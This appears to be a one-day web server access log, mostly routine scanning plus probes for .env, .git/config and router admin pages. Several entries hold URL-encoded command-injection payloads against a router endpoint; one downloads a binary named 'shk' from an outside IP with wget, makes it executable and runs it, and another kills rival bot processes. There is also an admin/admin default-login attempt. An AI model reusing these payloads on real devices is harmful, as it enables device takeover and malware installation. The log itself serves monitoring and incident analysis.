206.168.32.103 - - [01/Jul/2024:00:02:58 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [01/Jul/2024:00:03:01 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [01/Jul/2024:00:03:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [01/Jul/2024:01:37:20 +0200] "GET / HTTP/1.1" 200 1895 188.166.165.226 - - [01/Jul/2024:01:44:16 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.46 - - [01/Jul/2024:02:30:21 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.32 - - [01/Jul/2024:02:30:37 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.40 - - [01/Jul/2024:02:30:47 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.35 - - [01/Jul/2024:02:30:51 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 57.151.49.60 - - [01/Jul/2024:02:54:55 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [01/Jul/2024:03:05:34 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [01/Jul/2024:03:07:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.84 - - [01/Jul/2024:03:55:09 +0200] "GET / HTTP/1.0" 200 1895 115.55.250.198 - - [01/Jul/2024:03:56:12 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 115.55.250.198 - - [01/Jul/2024:03:56:12 +0200] "-" 400 1930 45.148.10.174 - - [01/Jul/2024:03:57:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [01/Jul/2024:03:57:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 51.8.71.85 - - [01/Jul/2024:04:26:31 +0200] "-" 400 1930 149.50.103.48 - - [01/Jul/2024:04:42:16 +0200] "GET / HTTP/1.1" 200 1895 14.102.49.77 - - [01/Jul/2024:04:55:06 +0200] "GET / HTTP/1.1" 200 1895 205.210.31.217 - - [01/Jul/2024:05:06:34 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [01/Jul/2024:05:09:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.95.169.184 - - [01/Jul/2024:05:24:23 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 45.95.169.184 - - [01/Jul/2024:05:24:23 +0200] "-" 400 1930 87.121.69.27 - - [01/Jul/2024:05:36:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 68.183.80.161 - - [01/Jul/2024:06:06:47 +0200] "-" 400 1930 68.183.80.161 - - [01/Jul/2024:06:06:47 +0200] "-" 400 1930 68.183.80.161 - - [01/Jul/2024:06:06:47 +0200] "GET / HTTP/1.1" 200 1895 68.183.80.161 - - [01/Jul/2024:06:06:48 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 174.138.61.44 - - [01/Jul/2024:06:19:47 +0200] "GET / HTTP/1.1" 200 1895 174.138.61.44 - - [01/Jul/2024:06:19:47 +0200] "-" 400 1930 149.50.103.48 - - [01/Jul/2024:06:30:56 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [01/Jul/2024:06:38:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [01/Jul/2024:06:38:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.71.249 - - [01/Jul/2024:06:53:27 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 45.156.128.49 - - [01/Jul/2024:07:38:35 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [01/Jul/2024:07:39:09 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [01/Jul/2024:08:11:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 125.167.118.125 - - [01/Jul/2024:08:50:56 +0200] "GET / HTTP/1.1" 200 1895 212.16.159.247 - - [01/Jul/2024:09:11:26 +0200] "GET / HTTP/1.0" 200 1895 45.128.232.200 - - [01/Jul/2024:09:20:18 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [01/Jul/2024:09:28:51 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [01/Jul/2024:10:14:52 +0200] "-" 400 1930 23.95.200.178 - - [01/Jul/2024:10:16:38 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [01/Jul/2024:10:18:49 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 185.106.94.117 - - [01/Jul/2024:10:33:17 +0200] "CONNECT www.google.com:443 HTTP/1.0" 400 804 185.224.128.63 - - [01/Jul/2024:10:37:37 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [01/Jul/2024:10:37:37 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [01/Jul/2024:10:37:37 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [01/Jul/2024:10:37:37 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [01/Jul/2024:10:55:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.108 - - [01/Jul/2024:11:09:44 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [01/Jul/2024:11:09:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [01/Jul/2024:11:09:48 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [01/Jul/2024:11:24:25 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.110 - - [01/Jul/2024:11:29:19 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 78.108.177.52 - - [01/Jul/2024:11:32:06 +0200] "GET / HTTP/1.0" 200 1895 194.59.31.99 - - [01/Jul/2024:11:36:01 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 221.122.67.75 - - [01/Jul/2024:11:48:51 +0200] "GET / HTTP/1.1" 200 1895 79.10.169.86 - - [01/Jul/2024:12:45:45 +0200] "-" 400 1930 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "-" 400 1930 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET / HTTP/1.1" 200 1895 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "-" 400 1930 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET / HTTP/1.1" 200 1895 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET /.env HTTP/1.1" 404 722 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET /telescope/requests HTTP/1.1" 404 740 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET /info.php HTTP/1.1" 404 726 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET /.git/config HTTP/1.1" 404 733 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET /server-status HTTP/1.1" 404 731 35.216.223.16 - - [01/Jul/2024:13:03:23 +0200] "GET /config.json HTTP/1.1" 404 729 79.10.169.86 - - [01/Jul/2024:13:03:28 +0200] "-" 400 1930 87.121.69.27 - - [01/Jul/2024:13:26:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 84.54.51.43 - - [01/Jul/2024:13:30:33 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [01/Jul/2024:13:34:58 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.49 - - [01/Jul/2024:14:06:32 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.49 - - [01/Jul/2024:14:06:35 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.49 - - [01/Jul/2024:14:06:35 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.112 - - [01/Jul/2024:14:06:48 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.112 - - [01/Jul/2024:14:06:52 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.112 - - [01/Jul/2024:14:06:55 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.224.3.4 - - [01/Jul/2024:14:25:50 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 400 804 185.224.3.4 - - [01/Jul/2024:14:25:57 +0200] "-" 400 1930 45.148.10.174 - - [01/Jul/2024:14:39:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [01/Jul/2024:14:39:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 35.216.197.46 - - [01/Jul/2024:14:44:13 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [01/Jul/2024:14:44:26 +0200] "GET / HTTP/1.1" 200 1895 79.10.169.86 - - [01/Jul/2024:14:54:11 +0200] "-" 400 1930 81.7.114.190 - - [01/Jul/2024:15:08:50 +0200] "HEAD / HTTP/1.1" 200 - 81.7.114.190 - - [01/Jul/2024:15:08:50 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [01/Jul/2024:15:13:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.197.114 - - [01/Jul/2024:15:37:17 +0200] "-" 400 1930 94.146.45.86 - - [01/Jul/2024:15:47:40 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 149.50.103.48 - - [01/Jul/2024:16:23:53 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [01/Jul/2024:16:42:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [01/Jul/2024:16:42:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 88.214.25.62 - - [01/Jul/2024:16:52:51 +0200] "-" 400 1930 87.121.69.27 - - [01/Jul/2024:16:56:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.106 - - [01/Jul/2024:17:00:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [01/Jul/2024:17:00:29 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [01/Jul/2024:17:00:29 +0200] "GET /favicon.ico HTTP/1.1" 404 729 177.126.18.188 - - [01/Jul/2024:17:02:10 +0200] "GET / HTTP/1.1" 200 1895 91.92.251.254 - - [01/Jul/2024:17:36:51 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 78.108.177.50 - - [01/Jul/2024:18:00:14 +0200] "GET / HTTP/1.0" 200 1895 119.200.13.201 - - [01/Jul/2024:18:18:30 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 139.59.17.84 - - [01/Jul/2024:18:40:27 +0200] "-" 400 1930 139.59.17.84 - - [01/Jul/2024:18:40:28 +0200] "-" 400 1930 139.59.17.84 - - [01/Jul/2024:18:40:28 +0200] "GET / HTTP/1.1" 200 1895 139.59.17.84 - - [01/Jul/2024:18:40:28 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 149.50.103.48 - - [01/Jul/2024:18:48:15 +0200] "GET / HTTP/1.1" 200 1895 79.137.67.195 - - [01/Jul/2024:18:53:51 +0200] "-" 400 1930 79.137.67.195 - - [01/Jul/2024:18:53:51 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [01/Jul/2024:19:02:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [01/Jul/2024:19:02:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [01/Jul/2024:19:26:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 84.54.51.164 - - [01/Jul/2024:19:41:52 +0200] "POST /login HTTP/1.1" 404 723 149.50.103.48 - - [01/Jul/2024:20:00:09 +0200] "GET / HTTP/1.1" 200 1895 164.90.174.121 - - [01/Jul/2024:20:04:13 +0200] "-" 400 1930 164.90.174.121 - - [01/Jul/2024:20:04:59 +0200] "GET /hello HTTP/1.1" 404 723 84.54.51.164 - - [01/Jul/2024:20:18:36 +0200] "POST /login HTTP/1.1" 404 723 104.168.70.165 - - [01/Jul/2024:20:26:50 +0200] "GET / HTTP/1.1" 200 1895 179.60.147.47 - - [01/Jul/2024:20:28:29 +0200] "-" 400 1930 167.99.86.81 - - [01/Jul/2024:20:29:09 +0200] "-" 400 1930 71.6.232.24 - - [01/Jul/2024:20:36:16 +0200] "GET / HTTP/1.1" 200 1895 117.216.155.210 - - [01/Jul/2024:21:19:14 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 749 87.121.69.27 - - [01/Jul/2024:21:31:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.200 - - [01/Jul/2024:21:33:03 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.128.232.200 - - [01/Jul/2024:21:49:41 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.148.10.174 - - [01/Jul/2024:22:17:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [01/Jul/2024:22:17:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [01/Jul/2024:22:21:16 +0200] "GET / HTTP/1.1" 200 1895 185.180.140.4 - - [01/Jul/2024:22:45:05 +0200] "GET / HTTP/1.1" 200 1895 185.180.140.4 - - [01/Jul/2024:22:45:13 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 767 198.235.24.206 - - [01/Jul/2024:23:10:43 +0200] "GET / HTTP/1.0" 200 1895 41.232.108.100 - - [01/Jul/2024:23:13:43 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 91.92.247.105 - - [01/Jul/2024:23:18:37 +0200] "HEAD / HTTP/1.0" 200 - 91.92.247.105 - - [01/Jul/2024:23:18:37 +0200] "GET /.git/config HTTP/1.1" 404 733 149.50.103.48 - - [01/Jul/2024:23:32:01 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.26 - - [01/Jul/2024:23:33:34 +0200] "GET / HTTP/1.1" 200 1895 36.99.136.128 - - [01/Jul/2024:23:49:13 +0200] "GET / HTTP/1.1" 200 1895 36.99.136.137 - - [01/Jul/2024:23:49:13 +0200] "GET /favicon.ico HTTP/1.1" 404 729 36.99.136.128 - - [01/Jul/2024:23:50:25 +0200] "GET / HTTP/1.1" 200 1895 36.99.136.136 - - [01/Jul/2024:23:50:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729